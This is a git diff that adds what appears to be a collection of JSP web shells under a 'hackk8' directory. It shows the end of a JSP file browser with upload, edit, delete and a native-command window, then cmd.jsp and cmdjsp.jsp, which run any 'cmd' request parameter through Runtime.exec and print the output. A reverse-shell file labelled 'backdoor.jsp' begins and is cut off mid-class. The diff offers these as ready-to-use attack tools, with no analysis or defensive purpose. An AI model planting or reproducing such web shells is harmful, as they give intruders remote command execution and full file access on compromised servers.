+                request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
+            }
+            else if (f.exists() && f.canRead()) {
+                if (isPacked(f.getName(), false)) {
+                    //If zipFile, do nothing here
+                }
+                else{
+                    String mimeType = getMimeType(f.getName());
+                    response.setContentType(mimeType);
+                    if (mimeType.equals("text/plain")) response.setHeader(
+                            "Content-Disposition", "inline;filename=\"temp.txt\"");
+                    else response.setHeader("Content-Disposition", "inline;filename=\""
+                            + f.getName() + "\"");
+                    BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+                    byte buffer[] = new byte[8 * 1024];
+                    out.clearBuffer();
+                    OutputStream out_s = new Writer2Stream(out);
+                    copyStreamsWithoutClose(fileInput, out_s, buffer);
+                    fileInput.close();
+                    out_s.flush();
+                    nohtml = true;
+                    dir_view = false;
+                }
+            }
+            else {
+                request.setAttribute("dir", f.getParent());
+                request.setAttribute("error", "File " + f.getAbsolutePath()
+                        + " does not exist or is not readable on the server");
+            }
+		}
+		// Download selected files as zip file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), false);
+			//Check if all files in vector are allowed
+			String notAllowedFile = null;
+			for (int i = 0;i < v.size(); i++){
+				File f = (File) v.get(i);
+				if (!isAllowed(f)){
+					notAllowedFile = f.getAbsolutePath();
+					break;
+				}
+			}
+			if (notAllowedFile != null){
+				request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
+			}
+			else if (v.size() == 0) {
+				request.setAttribute("error", "No files selected");
+			}
+			else {
+				File dir_file = new File("" + request.getAttribute("dir"));
+				int dir_l = dir_file.getAbsolutePath().length();
+				response.setContentType("application/zip");
+				response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
+				out.clearBuffer();
+				ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
+				zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
+				zipout.setLevel(COMPRESSION_LEVEL);
+				for (int i = 0; i < v.size(); i++) {
+					File f = (File) v.get(i);
+					if (f.canRead()) {
+						zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
+						BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
+						byte buffer[] = new byte[0xffff];
+						copyStreamsWithoutClose(fr, zipout, buffer);
+						/*					int b;
+						 while ((b=fr.read())!=-1) zipout.write(b);*/
+						fr.close();
+						zipout.closeEntry();
+					}
+				}
+				zipout.finish();
+				out.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+		}
+		// Download file
+		else if (request.getParameter("downfile") != null) {
+			String filePath = request.getParameter("downfile");
+			File f = new File(filePath);
+			if (!isAllowed(f)){
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
+			}
+			else if (f.exists() && f.canRead()) {
+				response.setContentType("application/octet-stream");
+				response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+						+ "\"");
+				response.setContentLength((int) f.length());
+				BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+				byte buffer[] = new byte[8 * 1024];
+				out.clearBuffer();
+				OutputStream out_s = new Writer2Stream(out);
+				copyStreamsWithoutClose(fileInput, out_s, buffer);
+				fileInput.close();
+				out_s.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+			else {
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "File " + f.getAbsolutePath()
+						+ " does not exist or is not readable on the server");
+			}
+		}
+		if (nohtml) return;
+		//else
+			// If no parameter is submitted, it will take the path from jsp file browser
+			if (request.getAttribute("dir") == null) {
+				String path = null;
+				if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+						application.getRealPath(request.getRequestURI())).getParent();
+
+				if (path == null) { // handle the case where we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+				}
+				//Check path
+                if (!isAllowed(new File(path))){
+                    if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
+                    else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
+                }
+				request.setAttribute("dir", path);
+			}%>
+
+
+
+
+
+
+
+<%
+			//If a cssfile exists, it will take it
+			String cssPath = null;
+			if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
+					application.getRealPath(request.getRequestURI())).getParent()
+					+ File.separator + CSS_NAME;
+			if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
+			if (new File(cssPath).exists()) {
+%>
+
+      <%}
+			else if (request.getParameter("uplMonitor") == null) {%>
+	
+	<%}
+		
+        //Check path
+        if (!isAllowed(new File((String)request.getAttribute("dir")))){
+            request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
+        }
+		//Upload monitor
+		else if (request.getParameter("uplMonitor") != null) {%>
+	<%
+			String fname = request.getParameter("uplMonitor");
+			//First opening
+			boolean first = false;
+			if (request.getParameter("first") != null) first = true;
+			UplInfo info = new UplInfo();
+			if (!first) {
+				info = UploadMonitor.getInfo(fname);
+				if (info == null) {
+					//Windows
+					int posi = fname.lastIndexOf("\\");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+				if (info == null) {
+					//Unix
+					int posi = fname.lastIndexOf("/");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+			}
+			dir_view = false;
+			request.setAttribute("dir", null);
+			if (info.aborted) {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload aborted.
+<%
+			}
+			else if (info.totalSize != info.currSize || info.currSize == 0) {
+				%>
+
+
+
+Upload of <%=fname%>

    
+
    
+
+
+
    
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
+(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    
+Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
+
+<%
+			}
+			else {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload finished.
+
+<%
+			}
+		}
+		//Comandwindow
+		else if (request.getParameter("command") != null) {
+            if (!NATIVE_COMMANDS){
+                request.setAttribute("error", "Execution of native commands is not allowed!");
+            }
+			else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
+%>
+Launch commands in <%=request.getAttribute("dir")%>
+
+
+<%
+				out.println("
    \n"
+						+ "
+	">
+	
    
+	
+	
+	
+	
    
+	
+	
    
+	">
+	
    
+	
    
+
+
+<%
+				dir_view = false;
+				request.setAttribute("dir", null);
+			}
+		}
+
+		//Click on a filename, special viewer (zip+jar file)
+		else if (request.getParameter("file") != null) {
+			File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)){
+                request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+            }
+			else if (isPacked(f.getName(), false)) {
+				//ZipFile
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+%>
+<%= f.getAbsolutePath()%>
+
+
+	
    Content of <%=conv2Html(f.getName())%>

    
+	
+	
+<%
+					long size = 0;
+					int fileCount = 0;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()) {
+							fileCount++;
+							size += entry.getSize();
+							long ratio = 0;
+							if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
+									/ entry.getSize();
+							out.println("");
+
+						}
+					}
+					zf.close();
+					//No directory view
+					dir_view = false;
+					request.setAttribute("dir", null);
+%>
+	
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName())
+									+ "" + convertFileSize(entry.getSize()) + ""
+									+ convertFileSize(entry.getCompressedSize()) + ""
+									+ ratio + "%" + ""
+									+ dateFormat.format(new Date(entry.getTime())) + "
    
+	
    
+	<%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
+	
    
+
+<%
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot read " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+							+ ex);
+				}
+			}
+		}
+		// Upload
+		else if ((request.getContentType() != null)
+				&& (request.getContentType().toLowerCase().startsWith("multipart"))) {
+			response.setContentType("text/html");
+			HttpMultiPartParser parser = new HttpMultiPartParser();
+			boolean error = false;
+			try {
+				int bstart = request.getContentType().lastIndexOf("oundary=");
+				String bound = request.getContentType().substring(bstart + 8);
+				int clength = request.getContentLength();
+				Hashtable ht = parser
+						.processData(request.getInputStream(), bound, tempdir, clength);
+                if (!isAllowed(new File((String)ht.get("dir")))){
+                    request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
+                    error = true;
+                }
+				else if (ht.get("myFile") != null) {
+					FileInfo fi = (FileInfo) ht.get("myFile");
+					File f = fi.file;
+					UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+					if (info != null && info.aborted) {
+						f.delete();
+						request.setAttribute("error", "Upload aborted");
+					}
+					else {
+						// Move file from temp to the right dir
+						String path = (String) ht.get("dir");
+						if (!path.endsWith(File.separator)) path = path + File.separator;
+						if (!f.renameTo(new File(path + f.getName()))) {
+							request.setAttribute("error", "Cannot upload file.");
+							error = true;
+							f.delete();
+						}
+					}
+				}
+				else {
+					request.setAttribute("error", "No file selected for upload");
+					error = true;
+				}
+				request.setAttribute("dir", (String) ht.get("dir"));
+			}
+			catch (Exception e) {
+				request.setAttribute("error", "Error " + e + ". Upload aborted");
+				error = true;
+			}
+			if (!error) request.setAttribute("message", "File upload correctly finished.");
+		}
+		// The form to edit a text file
+		else if (request.getParameter("editfile") != null) {
+			File ef = new File(request.getParameter("editfile"));
+            if (!isAllowed(ef)){
+                request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
+            }
+            else{
+%>
+Edit <%=conv2Html(request.getParameter("editfile"))%>
+
+
+<%
+                BufferedReader reader = new BufferedReader(new FileReader(ef));
+                String disable = "";
+                if (!ef.canWrite()) disable = " readonly";
+                out.println("
    \n"
+                        + "
+	">
+	
    
+	
+		
+		
+		
+		
+		
+		
+	
    >Ms-Dos/Windows>UnixWrite backup
    
+		">
+		
    
+	
    
+
+
+<%
+            }
+		}
+		// Save or cancel the edited file
+		else if (request.getParameter("nfile") != null) {
+			File f = new File(request.getParameter("nfile"));
+			File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
+            if (!isAllowed(new_f)){
+                request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath());
+            }
+			else if (request.getParameter("Submit").equals("Save")) {
+				if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) {
+					File bak = new File(new_f.getAbsolutePath() + ".bak");
+					bak.delete();
+					new_f.renameTo(bak);
+				}
+				if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error",
+						"Cannot write to " + new_f.getName() + ", file is write protected.");
+				else {
+					BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
+					StringReader text = new StringReader(request.getParameter("text"));
+					int i;
+					boolean cr = false;
+					String lineend = "\n";
+					if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n";
+					while ((i = text.read()) >= 0) {
+						if (i == '\r') cr = true;
+						else if (i == '\n') {
+							outs.write(lineend);
+							cr = false;
+						}
+						else if (cr) {
+							outs.write(lineend);
+							cr = false;
+						}
+						else {
+							outs.write(i);
+							cr = false;
+						}
+					}
+					outs.flush();
+					outs.close();
+				}
+			}
+			request.setAttribute("dir", f.getParent());
+		}
+		//Unpack file to the current directory without overwriting
+		else if (request.getParameter("unpackfile") != null) {
+			File f = new File(request.getParameter("unpackfile"));
+			String root = f.getParent();
+			request.setAttribute("dir", root);
+            if (!isAllowed(new File(root))){
+                request.setAttribute("error", "You are not allowed to access " + root);
+            }
+			//Check if file exists
+			else if (!f.exists()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", file does not exist");
+			}
+			//Check if directory is readonly
+			else if (!f.getParentFile().canWrite()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", directory is write protected.");
+			}
+			//GZip
+			else if (f.getName().toLowerCase().endsWith(".gz")) {
+				//New name is old Name without .gz
+				String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3);
+				try {
+					byte buffer[] = new byte[0xffff];
+					copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream(
+							newName), buffer);
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+			//Else try Zip
+			else {
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+					//First check whether a file already exist
+					boolean error = false;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()
+								&& new File(root + File.separator + entry.getName()).exists()) {
+							request.setAttribute("error", "Cannot unpack " + f.getName()
+									+ ", File " + entry.getName() + " already exists.");
+							error = true;
+							break;
+						}
+					}
+					if (!error) {
+						//Unpack File
+						entries = zf.entries();
+						byte buffer[] = new byte[0xffff];
+						while (entries.hasMoreElements()) {
+							ZipEntry entry = (ZipEntry) entries.nextElement();
+							File n = new File(root + File.separator + entry.getName());
+							if (entry.isDirectory()) n.mkdirs();
+							else {
+								n.getParentFile().mkdirs();
+								n.createNewFile();
+								copyStreams(zf.getInputStream(entry), new FileOutputStream(n),
+										buffer);
+							}
+						}
+						zf.close();
+						request.setAttribute("message", "Unpack of " + f.getName()
+								+ " was successful.");
+					}
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot unpack " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+		}
+		// Delete Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(DELETE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			boolean error = false;
+			//delete backwards
+			for (int i = v.size() - 1; i >= 0; i--) {
+				File f = (File) v.get(i);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                    error = true;
+                    break;
+                }
+				if (!f.canWrite() || !f.delete()) {
+					request.setAttribute("error", "Cannot delete " + f.getAbsolutePath()
+							+ ". Deletion aborted");
+					error = true;
+					break;
+				}
+			}
+			if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted");
+			else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted");
+			else if (!error) request.setAttribute("error", "No files selected");
+		}
+		// Create Directory
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_DIR))) {
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+			else if (new File(new_dir).mkdirs()) {
+				request.setAttribute("message", "Directory created");
+			}
+			else request.setAttribute("error", "Creation of directory " + new_dir + " failed");
+		}
+		// Create a new empty file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_FILE))) {
+			String dir = "" + request.getAttribute("dir");
+			String file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// Test, if file_name is empty
+			else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) {
+				if (new File(new_file).createNewFile()) request.setAttribute("message",
+						"File created");
+				else request.setAttribute("error", "Creation of file " + new_file + " failed");
+			}
+			else request.setAttribute("error", "Error: " + file_name + " is not a valid filename");
+		}
+		// Rename a file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(RENAME_FILE))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String new_file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, new_file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// The error conditions:
+			// 1) Zero Files selected
+			else if (v.size() <= 0) request.setAttribute("error",
+					"Select exactly one file or folder. Rename failed");
+			// 2a) Multiple files selected and the first isn't a dir
+			//     Here we assume that expandFileList builds v from top-bottom, starting with the dirs
+			else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute(
+					"error", "Select exactly one file or folder. Rename failed");
+			// 2b) If there are multiple files from the same directory, rename fails
+			else if ((v.size() > 1) && ((File) v.get(0)).isDirectory()
+					&& !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) {
+				request.setAttribute("error", "Select exactly one file or folder. Rename failed");
+			}
+			else {
+				File f = (File) v.get(0);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				// Test, if file_name is empty
+				else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) {
+					if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) {
+						request.setAttribute("error", "Creation of file " + new_file + " failed");
+					}
+					else request.setAttribute("message", "Renamed file "
+							+ ((File) v.get(0)).getName() + " to " + new_file);
+				}
+				else request.setAttribute("error", "Error: \"" + new_file_name
+						+ "\" is not a valid filename");
+			}
+		}
+		// Move selected file(s)
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(MOVE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                // This ensures that new_dir is a directory
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                for (int i = v.size() - 1; i >= 0; i--) {
+                    File f = (File) v.get(i);
+                    if (!isAllowed(f)){
+                        request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                        error = true;
+                        break;
+                    }
+                    else if (!f.canWrite() || !f.renameTo(new File(new_dir
+                            + f.getAbsolutePath().substring(dir.length())))) {
+                        request.setAttribute("error", "Cannot move " + f.getAbsolutePath()
+                                + ". Move aborted");
+                        error = true;
+                        break;
+                    }
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Copy Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(COPY_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = (String) request.getAttribute("dir");
+			if (!dir.endsWith(File.separator)) dir += File.separator;
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                try {
+                    byte buffer[] = new byte[0xffff];
+                    for (int i = 0; i < v.size(); i++) {
+                        File f_old = (File) v.get(i);
+                        File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length()));
+                        if (!isAllowed(f_old)|| !isAllowed(f_new)){
+                            request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath());
+                            error = true;
+                        }
+                        else if (f_old.isDirectory()) f_new.mkdirs();
+                        // Overwriting is forbidden
+                        else if (!f_new.exists()) {
+                            copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer);
+                        }
+                        else {
+                            // File exists
+                            request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath()
+                                    + ", file already exists. Copying aborted");
+                            error = true;
+                            break;
+                        }
+                    }
+                }
+                catch (IOException e) {
+                    request.setAttribute("error", "Error " + e + ". Copying aborted");
+                    error = true;
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Directory viewer
+		if (dir_view && request.getAttribute("dir") != null) {
+			File f = new File("" + request.getAttribute("dir"));
+			//Check, whether the dir exists
+			if (!f.exists() || !isAllowed(f)) {
+				if (!f.exists()){
+                    request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist.");
+                }
+                else{
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				//if attribute olddir exists, it will change to olddir
+				if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) {
+					f = new File("" + request.getAttribute("olddir"));
+				}
+				//try to go to the parent dir
+				else {
+					if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent());
+				}
+				//If this dir also do also not exist, go back to browser.jsp root path
+				if (!f.exists()) {
+					String path = null;
+					if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+							application.getRealPath(request.getRequestURI())).getParent();
+
+					if (path == null) // handle the case were we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+					f = new File(path);
+				}
+				if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath());
+                else request.setAttribute("dir", null);
+			}
+%>
+
+<%=request.getAttribute("dir")%>
+
+
+<%
+			//Output message
+			if (request.getAttribute("message") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("message"));
+				out.println("
    ");
+			}
+			//Output error
+			if (request.getAttribute("error") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("error"));
+				out.println("
    ");
+			}
+            if (request.getAttribute("dir") != null){
+%>
+	
    
+	
+<%
+			// Output the table, starting with the headers.
+			String dir = URLEncoder.encode("" + request.getAttribute("dir"));
+			String cmd = browser_name + "?dir=" + dir;
+			int sortMode = 1;
+			if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request
+					.getParameter("sort"));
+			int[] sort = new int[] {1, 2, 3, 4};
+			for (int i = 0; i < sort.length; i++)
+				if (sort[i] == sortMode) sort[i] = -sort[i];
+			out.println(""
+					+ ""
+					+ ""
+					+ ""
+					+ "");
+			char trenner = File.separatorChar;
+			// Output the Root-Dirs, without FORBIDDEN_DRIVES
+			File[] entry = File.listRoots();
+			for (int i = 0; i < entry.length; i++) {
+				boolean forbidden = false;
+				for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) {
+					if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true;
+				}
+				if (!forbidden) {
+					out.println("");
+					out.println("");
+				}
+			}
+			// Output the parent directory link ".."
+			if (f.getParent() != null) {
+				out.println("");
+				out.println("");
+			}
+			// Output all files and dirs and calculate the number of files and total size
+			entry = f.listFiles();
+			if (entry == null) entry = new File[] {};
+			long totalSize = 0; // The total size of the files in the current directory
+			long fileCount = 0; // The count of files in the current working directory
+			if (entry != null && entry.length > 0) {
+				Arrays.sort(entry, new FileComp(sortMode));
+				for (int i = 0; i < entry.length; i++) {
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String type = "File"; // This String will tell the extension of the file
+					if (entry[i].isDirectory()) type = "DIR"; // It's a DIR
+					else {
+						String tempName = entry[i].getName().replace(' ', '_');
+						if (tempName.lastIndexOf('.') != -1) type = tempName.substring(
+								tempName.lastIndexOf('.')).toLowerCase();
+					}
+					String ahref = "";
+					String link = buf; // The standard view link, uses Mime-type
+					if (entry[i].isDirectory()) {
+						if (entry[i].canRead() && USE_DIR_PREVIEW) {
+							//Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip
+							File[] fs = entry[i].listFiles();
+							if (fs == null) fs = new File[] {};
+							Arrays.sort(fs, new FileComp());
+							StringBuffer filenames = new StringBuffer();
+							for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) {
+								String fname = conv2Html(fs[i2].getName());
+								if (fs[i2].isDirectory()) filenames.append("[" + fname + "];");
+								else filenames.append(fname + ";");
+							}
+							if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("...");
+							else if (filenames.length() > 0) filenames
+									.setLength(filenames.length() - 1);
+							link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">"
+									+ FOL_IMG + "[" + buf + "]";
+						}
+						else if (entry[i].canRead()) {
+							link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]";
+						}
+						else link = FOL_IMG + "[" + buf + "]";
+					}
+					else if (entry[i].isFile()) { //Entry is file
+						totalSize = totalSize + entry[i].length();
+						fileCount = fileCount + 1;
+						if (entry[i].canRead()) {
+							dlink = ahref + "downfile=" + name + "\">Download";
+							//If you click at the filename
+							if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">"
+									+ buf + "";
+							else link = ahref + "file=" + name + "\">" + buf + "";
+							if (entry[i].canWrite()) { // The file can be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">Edit";
+							}
+							else { // If the file cannot be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">View";
+							}
+						}
+						else {
+							link = buf;
+						}
+					}
+					String date = dateFormat.format(new Date(entry[i].lastModified()));
+					out.println("");
+					if (entry[i].canRead()) {
+						out
+								.println("");
+					}
+					else {
+						out
+								.println("");
+					}
+					out.print("");
+					if (entry[i].isDirectory()) out.print("");
+					else {
+						out.print("");
+					}
+					out.println(""); // The edit link (or view, depending)
+				}
+			}%>
+	
     NameSizeTypeDate  
     ");
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String buf = entry[i].getAbsolutePath();
+					out.println("  [" + buf + "]");
+					out
+							.println("     
    ");
+				out.println("  " + FOL_IMG + "[..]");
+				out
+						.println("     
      " + link + " "
+								+ convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension)
+							date + "" + // The date the file was created
+							dlink + "" + // The download link
+							elink + "
    
+	Select all
+	
    
+		
+		<%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
+		
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	
    
+		
+		
+		
+		
+		
+		
+	
    
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	<% if (NATIVE_COMMANDS){%>
+    
    
+		">
+		
+		
+		
+	
    <%
+    }
+    }%>
+	
    
+	
    
+		jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de
+	
    
+
+<%
+    }
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/cmd.jsp b/jsp/hackk8/jsp2/cmd.jsp
new file mode 100644
index 0000000..6357276
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmd.jsp
@@ -0,0 +1,35 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "
    ");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+
    
+
+
+
diff --git a/jsp/hackk8/jsp2/cmdjsp.jsp b/jsp/hackk8/jsp2/cmdjsp.jsp
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+
    
+
+
+
    
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+
    +<%=output %>
+
    
+
+
diff --git a/jsp/hackk8/jsp2/jsp-reverse.jsp b/jsp/hackk8/jsp2/jsp-reverse.jsp
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/jsp/hackk8/jsp2/jsp-reverse.jsp
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
